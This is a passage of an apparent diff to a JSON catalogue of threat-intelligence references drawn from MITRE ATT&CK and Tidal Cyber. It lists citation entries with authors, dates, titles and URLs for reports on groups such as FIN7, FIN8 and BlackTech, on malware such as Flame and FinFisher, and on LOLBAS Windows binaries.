"6ee27fdb-1753-4fdf-af72-3295b072ff10", + "value": "FireEye FIN7 April 2017" + }, + { + "description": "Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.", + "meta": { + "date_accessed": "2022-04-05T00:00:00Z", + "date_published": "2022-04-04T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/evolution-of-fin7" + ], + "source": "MITRE", + "title": "FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7" + }, + "related": [], + "uuid": "be9919c0-ca52-593b-aea0-c5e9a262b570", + "value": "Mandiant FIN7 Apr 2022" + }, + { + "description": "Gemini Advisory. (2021, October 21). FIN7 Recruits Talent For Push Into Ransomware. Retrieved February 2, 2022.", + "meta": { + "date_accessed": "2022-02-02T00:00:00Z", + "date_published": "2021-10-21T00:00:00Z", + "refs": [ + "https://geminiadvisory.io/fin7-ransomware-bastion-secure/" + ], + "source": "MITRE", + "title": "FIN7 Recruits Talent For Push Into Ransomware" + }, + "related": [], + "uuid": "bbaef178-8577-4398-8e28-604faf0950b4", + "value": "Gemini FIN7 Oct 2021" + }, + { + "description": "Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.", + "meta": { + "date_accessed": "2019-06-18T00:00:00Z", + "date_published": "2019-03-01T00:00:00Z", + "refs": [ + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" + ], + "source": "MITRE", + "title": "FIN7 Revisited: Inside Astra Panel and SQLRat Malware" + }, + "related": [], + "uuid": "b09453a3-c0df-4e96-b399-e7b34e068e9d", + "value": "Flashpoint FIN 7 March 2019" + }, + { + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.", + "meta": { + "date_accessed": "2017-03-08T00:00:00Z", + "date_published": "2017-03-07T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings" + }, + "related": [], + "uuid": "7987bb91-ec41-42f8-bd2d-dabc26509a08", + "value": "FireEye FIN7 March 2017" + }, + { + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.", + "meta": { + "date_accessed": "2017-07-13T00:00:00Z", + "date_published": "2017-06-09T00:00:00Z", + "refs": [ + "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + ], + "source": "MITRE", + "title": "FIN7 Takes Another Bite at the Restaurant Industry" + }, + "related": [], + "uuid": "3831173c-7c67-4f16-b652-ad992a7ce411", + "value": "Morphisec FIN7 June 2017" + }, + { + "description": "Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/" + ], + "source": "MITRE", + "title": "Fin7 weaponization of DDE is just their latest slick move, say researchers" + }, + "related": [], + "uuid": "e38adff1-7f53-4b0c-9d58-a4640b09b10d", + "value": "CyberScoop FIN7 Oct 2017" + }, + { + "description": "Vrabie, V., et al. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved September 8, 2021.", + "meta": { + "date_accessed": "2021-09-08T00:00:00Z", + "date_published": "2021-03-10T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf" + ], + "source": "MITRE", + "title": "FIN8 Returns with Improved BADHATCH Toolkit" + }, + "related": [], + "uuid": "958cfc9a-901c-549d-96c2-956272b240e3", + "value": "BitDefender BADHATCH Mar 2021" + }, + { + "description": "Bitdefender. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved October 30, 2023.", + "meta": { + "date_accessed": "2023-10-30T00:00:00Z", + "date_published": "2021-03-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf" + ], + "source": "Tidal Cyber", + "title": "FIN8 Returns with Improved BADHATCH Toolkit" + }, + "related": [], + "uuid": "501b6391-e09e-47dc-9cfc-c8ed4c034aca", + "value": "Bitdefender FIN8 BADHATCH Report" + }, + { + "description": "Budaca, E., et al. (2021, August 25). FIN8 Threat Actor Goes Agile with New Sardonic Backdoor. Retrieved August 9, 2023.", + "meta": { + "date_accessed": "2023-08-09T00:00:00Z", + "date_published": "2021-08-25T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf" + ], + "source": "MITRE", + "title": "FIN8 Threat Actor Goes Agile with New Sardonic Backdoor" + }, + "related": [], + "uuid": "8e9d05c9-6783-5738-ac85-a444810a8074", + "value": "Bitdefender Sardonic Aug 2021" + }, + { + "description": "Symantec Threat Hunter Team. (2023, July 18). FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware. Retrieved August 9, 2023.", + "meta": { + "date_accessed": "2023-08-09T00:00:00Z", + "date_published": "2023-07-18T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor" + ], + "source": "MITRE", + "title": "FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware" + }, + "related": [], + "uuid": "9b08b7f0-1a33-5d76-817f-448fac0d165a", + "value": "Symantec FIN8 Jul 2023" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2012-10-31T00:00:00Z", + "refs": [ + "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + ], + "source": "MITRE", + "title": "Final Report on DigiNotar Hack Shows Total Compromise of CA Servers" + }, + "related": [], + "uuid": "3c9b7b9a-d30a-4865-a96c-6e68d9e20452", + "value": "DiginotarCompromise" + }, + { + "description": "Brubaker, N. Zafra, D. K. Lunden, K. Proska, K. Hildebrandt, C.. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved February 15, 2021.", + "meta": { + "date_accessed": "2021-02-15T00:00:00Z", + "date_published": "2020-07-15T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html" + ], + "source": "MITRE", + "title": "Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families" + }, + "related": [], + "uuid": "4bd514b8-1f79-4946-b001-110ce5cf29a9", + "value": "FireEye Financial Actors Moving into OT" + }, + { + "description": "Jason (jxb5151). (2021, January 28). findapihash.py. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "date_published": "2021-01-28T00:00:00Z", + "refs": [ + "https://github.com/MITRECND/malchive/blob/main/malchive/utilities/findapihash.py" + ], + "source": "MITRE", + "title": "findapihash.py" + }, + "related": [], + "uuid": "2260f0a1-2a6c-4373-9e3a-624fd89446e3", + "value": "MITRECND FindAPIHash" + }, + { + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2020-04-28T00:00:00Z", + "refs": [ + "https://expel.io/blog/finding-evil-in-aws/" + ], + "source": "MITRE", + "title": "Finding Evil in AWS" + }, + "related": [], + "uuid": "4c2424d6-670b-4db0-a752-868b4c954e29", + "value": "Expel IO Evil in AWS" + }, + { + "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", + "meta": { + "date_accessed": "2016-04-05T00:00:00Z", + "date_published": "2013-11-01T00:00:00Z", + "refs": [ + "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840" + ], + "source": "MITRE", + "title": "Finding Hidden Threats by Decrypting SSL" + }, + "related": [], + "uuid": "d251a79b-8516-41a7-b394-47a761d0ab3b", + "value": "SANS Decrypting SSL" + }, + { + "description": "Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.", + "meta": { + "date_accessed": "2016-02-09T00:00:00Z", + "date_published": "2014-07-22T00:00:00Z", + "refs": [ + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf" + ], + "source": "MITRE", + "title": "Finding Holes Operation Emmental" + }, + "related": [], + "uuid": "36443369-4fa9-4802-8b21-68cc382b949f", + "value": "Operation Emmental" + }, + { + "description": "Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL & Exploiting Group Policy Preferences. Retrieved February 17, 2020.", + "meta": { + "date_accessed": "2020-02-17T00:00:00Z", + "date_published": "2015-12-28T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=2288" + ], + "source": "MITRE", + "title": "Finding Passwords in SYSVOL & Exploiting Group Policy Preferences" + }, + "related": [], + "uuid": "538def90-5de4-4b8c-b535-0e2570ba1841", + "value": "ADSecurity Finding Passwords in SYSVOL" + }, + { + "description": "LOLBAS. (2018, May 25). Findstr.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/" + ], + "source": "Tidal Cyber", + "title": "Findstr.exe" + }, + "related": [], + "uuid": "fc4b7b28-ac74-4a8f-a39d-ce55df5fca08", + "value": "Findstr.exe - LOLBAS Project" + }, + { + "description": "FinFisher. (n.d.). Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "refs": [ + "http://www.finfisher.com/FinFisher/index.html" + ], + "source": "MITRE", + "title": "FinFisher Citation" + }, + "related": [], + "uuid": "6ef0b8d8-ba98-49ce-807d-5a85d111b027", + "value": "FinFisher Citation" + }, + { + "description": "Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.", + "meta": { + "date_accessed": "2018-07-09T00:00:00Z", + "date_published": "2018-03-01T00:00:00Z", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + ], + "source": "MITRE", + "title": "FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines" + }, + "related": [], + "uuid": "88c97a9a-ef14-4695-bde0-9de2b5f5343b", + "value": "Microsoft FinFisher March 2018" + }, + { + "description": "Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.", + "meta": { + "date_accessed": "2022-01-27T00:00:00Z", + "date_published": "2018-03-01T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + ], + "source": "MITRE", + "title": "FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines" + }, + "related": [], + "uuid": "b2f4541e-f981-4b25-abf4-1bec92b16faa", + "value": "FinFisher exposed" + }, + { + "description": "LOLBAS. (2021, August 30). Finger.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Finger/" + ], + "source": "Tidal Cyber", + "title": "Finger.exe" + }, + "related": [], + "uuid": "e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2", + "value": "Finger.exe - LOLBAS Project" + }, + { + "description": "FireEye. (n.d.). Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf" + ], + "source": "MITRE", + "title": "FireEye Cyber Threats to Media Industries" + }, + "related": [], + "uuid": "7b9bd753-01b7-4923-9964-19c59123ace2", + "value": "FireEye Cyber Threats to Media Industries" + }, + { + "description": "Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ], + "source": "MITRE", + "title": "FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry" + }, + "related": [], + "uuid": "9d58bcbb-5b96-4e12-8ff2-e0b084c3eb8c", + "value": "FireEye DLL Side-Loading" + }, + { + "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", + "meta": { + "date_accessed": "2017-01-11T00:00:00Z", + "date_published": "2016-11-30T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" + ], + "source": "MITRE", + "title": "FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region" + }, + "related": [], + "uuid": "44b2eb6b-4902-4ca0-80e5-7333d620e075", + "value": "FireEye Shamoon Nov 2016" + }, + { + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "meta": { + "date_accessed": "2020-05-12T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + ], + "source": "MITRE", + "title": "FireEye Ryuk and Trickbot January 2019" + }, + "related": [], + "uuid": "b29dc755-f1f0-4206-9ecf-29257a1909ee", + "value": "FireEye Ryuk and Trickbot January 2019" + }, + { + "description": "Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.", + "meta": { + "date_accessed": "2022-04-18T00:00:00Z", + "date_published": "2021-01-07T00:00:00Z", + "refs": [ + "https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack" + ], + "source": "MITRE", + "title": "FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack" + }, + "related": [], + "uuid": "a662c764-8954-493f-88e5-e022e093a785", + "value": "DarkReading FireEye SolarWinds" + }, + { + "description": "Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-09-12T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html" + ], + "source": "MITRE", + "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY" + }, + "related": [], + "uuid": "142cf7a3-2ca2-4cf3-b95a-9f4b3bc1cdce", + "value": "FireEye FinSpy Sept 2017" + }, + { + "description": "Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.", + "meta": { + "date_accessed": "2018-10-10T00:00:00Z", + "date_published": "2018-01-16T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/" + ], + "source": "MITRE", + "title": "First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks" + }, + "related": [], + "uuid": "7d48b679-d44d-466e-b12b-16f0f9858d15", + "value": "RiskIQ Cobalt Jan 2018" + }, + { + "description": "Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "date_published": "2017-09-19T00:00:00Z", + "refs": [ + "https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/" + ], + "source": "MITRE", + "title": "First Chrome extension with JavaScript Crypto Miner detected" + }, + "related": [], + "uuid": "ae28f530-40da-451e-89b8-b472340c3e0a", + "value": "Chrome Extension Crypto Miner" + }, + { + "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.", + "meta": { + "date_accessed": "2023-07-14T00:00:00Z", + "date_published": "2023-04-21T00:00:00Z", + "refs": [ + "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters" + ], + "source": "MITRE", + "title": "First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters" + }, + "related": [], + "uuid": "6d6e2fc8-9806-5480-bfaa-a43a962a4980", + "value": "Aquasec Kubernetes Attack 2023" + }, + { + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "meta": { + "date_accessed": "2016-12-22T00:00:00Z", + "date_published": "2016-08-24T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + ], + "source": "MITRE", + "title": "First Twitter-controlled Android botnet discovered" + }, + "related": [], + "uuid": "845896a6-b21d-489d-b75c-1e35b3ec78e0", + "value": "ESET-Twitoor" + }, + { + "description": "Baldwin, M., Flores, J., Kess, B.. (2018, June 17). Five steps to securing your identity infrastructure. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2018-06-17T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/security/fundamentals/steps-secure-identity#block-end-user-consent" + ], + "source": "MITRE", + "title": "Five steps to securing your identity infrastructure" + }, + "related": [], + "uuid": "3a0c4458-c8ec-44f9-95cc-0eb136a927cb", + "value": "Microsoft Azure AD Admin Consent" + }, + { + "description": "Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2021-12-28T00:00:00Z", + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" + ], + "source": "MITRE", + "title": "Flagpro The new malware used by BlackTech" + }, + "related": [], + "uuid": "c0f523fa-7f3b-4c85-b48f-19ae770e9f3b", + "value": "NTT Security Flagpro new December 2021" + }, + { + "description": "Gostev, A. (2012, May 30). Flame: Bunny, Frog, Munch and BeetleJuice…. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2012-05-30T00:00:00Z", + "refs": [ + "https://securelist.com/flame-bunny-frog-munch-and-beetlejuice-2/32855/" + ], + "source": "MITRE", + "title": "Flame: Bunny, Frog, Munch and BeetleJuice…" + }, + "related": [], + "uuid": "c7d030ad-0ecf-458f-85d4-93778d759dc1", + "value": "Kaspersky Flame Functionality" + }, + { + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "meta": { + "date_accessed": "2018-09-06T00:00:00Z", + "refs": [ + "https://www.crysys.hu/publications/files/skywiper.pdf" + ], + "source": "MITRE", + "title": "Flamer): A complex malware for targeted attacks" + }, + "related": [], + "uuid": "ea35f530-b0fd-4e27-a7a9-6ba41566154c", + "value": "Crysys Skywiper" + }, + { + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.", + "meta": { + "date_accessed": "2017-02-25T00:00:00Z", + "date_published": "2012-05-31T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + ], + "source": "MITRE", + "title": "Flamer: A Recipe for Bluetoothache" + }, + "related": [], + "uuid": "691ada65-fe64-4917-b379-1db2573eea32", + "value": "Symantec Beetlejuice" + }, + { + "description": "LOLBAS. (2021, September 18). fltMC.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/FltMC/" + ], + "source": "Tidal Cyber", + "title": "fltMC.exe" + }, + "related": [], + "uuid": "cf9b4bd3-92f0-405b-85e7-95e65d548b79", + "value": "fltMC.exe - LOLBAS Project" + }, + { + "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.", + "meta": { + "date_accessed": "2020-05-28T00:00:00Z", + "date_published": "2017-12-05T00:00:00Z", + "refs": [ + "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/" + ], + "source": "MITRE", + "title": "Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code" + }, + "related": [], + "uuid": "8338ad75-89f2-47d8-b85b-7cbf331bd7cd", + "value": "IranThreats Kittens Dec 2017" + }, + { + "description": "Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2021-09-27T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/" + ], + "source": "MITRE", + "title": "FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor" + }, + "related": [], + "uuid": "1ef61100-c5e7-4725-8456-e508c5f6d68a", + "value": "MSTIC FoggyWeb September 2021" + }, + { + "description": "Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2019-09-10T00:00:00Z", + "refs": [ + "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/" + ], + "source": "MITRE", + "title": "Following the CloudTrail: Generating strong AWS security signals with Sumo Logic" + }, + "related": [], + "uuid": "96560211-59b3-4eae-b8a3-2f988f6fdca3", + "value": "Following the CloudTrail: Generating strong AWS security signals with Sumo Logic" + }, + { + "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020.", + "meta": { + "date_accessed": "2020-05-11T00:00:00Z", + "date_published": "2019-08-05T00:00:00Z", + "refs": [ + "https://www.group-ib.com/blog/rtm" + ], + "source": "MITRE", + "title": "Following the RTM Forensic examination of a computer infected with a banking trojan" + }, + "related": [], + "uuid": "739da2f2-2aea-4f65-bc4d-ec6723f90520", + "value": "Group IB RTM August 2019" + }, + { + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "meta": { + "date_accessed": "2020-05-05T00:00:00Z", + "date_published": "2017-06-22T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Following the Trail of BlackTech’s Cyber Espionage Campaigns" + }, + "related": [], + "uuid": "abb9cb19-d30e-4048-b106-eb29a6dad7fc", + "value": "TrendMicro BlackTech June 2017" + }, + { + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "meta": { + "date_accessed": "2016-06-01T00:00:00Z", + "date_published": "2016-04-01T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6" + }, + "related": [], + "uuid": "8c0997e1-b285-42dd-9492-75065eac8f8b", + "value": "FireEye FIN6 April 2016" + }, + { + "description": "Vladislav Hrčka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf" + ], + "source": "MITRE", + "title": "FontOnLake" + }, + "related": [], + "uuid": "dbcced87-91ee-514f-98c8-29a85d967384", + "value": "ESET FontOnLake Analysis 2021" + }, + { + "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.", + "meta": { + "date_accessed": "2022-02-22T00:00:00Z", + "date_published": "2021-07-18T00:00:00Z", + "refs": [ + "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" + ], + "source": "MITRE", + "title": "Forensic Methodology Report: How to catch NSO Group’s Pegasus" + }, + "related": [], + "uuid": "9e40d93a-fe91-504a-a6f2-e6546067ba53", + "value": "amnesty_nso_pegasus" + }, + { + "description": "Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)" + ], + "source": "MITRE", + "title": "Forfiles" + }, + "related": [], + "uuid": "fd7eaa47-3512-4dbd-b881-bc679d06cd1b", + "value": "Microsoft Forfiles Aug 2016" + }, + { + "description": "LOLBAS. (2018, May 25). Forfiles.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/" + ], + "source": "Tidal Cyber", + "title": "Forfiles.exe" + }, + "related": [], + "uuid": "9e2c3833-b667-431c-a9e5-1b412583cc5a", + "value": "Forfiles.exe - LOLBAS Project" + }, + { + "description": "Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.", + "meta": { + "date_accessed": "2015-07-22T00:00:00Z", + "date_published": "2015-07-13T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory" + ], + "source": "MITRE", + "title": "“Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory" + }, + "related": [], + "uuid": "5ec05c01-8767-44c1-9855-e1b0e5ee0002", + "value": "Symantec Seaduke 2015" + }, + { + "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2015-02-28T00:00:00Z", + "refs": [ + "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/" + ], + "source": "MITRE", + "title": "FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers" + }, + "related": [], + "uuid": "89b85928-a962-4230-875c-63742b3c9d37", + "value": "Register Uber" + }, + { + "description": "Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2022-08-16T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668" + ], + "source": "MITRE", + "title": "format - Cisco IOS Configuration Fundamentals Command Reference" + }, + "related": [], + "uuid": "9442e08d-0858-5aa5-b642-a6b1e46018bc", + "value": "format_cmd_cisco" + }, + { + "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.", + "meta": { + "date_accessed": "2023-05-15T00:00:00Z", + "date_published": "2023-03-16T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem" + ], + "source": "MITRE", + "title": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation" + }, + "related": [], + "uuid": "a43dd8ce-23d6-5768-8522-6973dc45e1ac", + "value": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation" + }, + { + "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.", + "meta": { + "date_accessed": "2023-03-22T00:00:00Z", + "date_published": "2023-03-16T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem" + ], + "source": "MITRE", + "title": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation" + }, + "related": [], + "uuid": "7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7", + "value": "Mandiant Fortinet Zero Day" + }, + { + "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020.", + "meta": { + "date_accessed": "2020-07-01T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/foundation" + ], + "source": "MITRE", + "title": 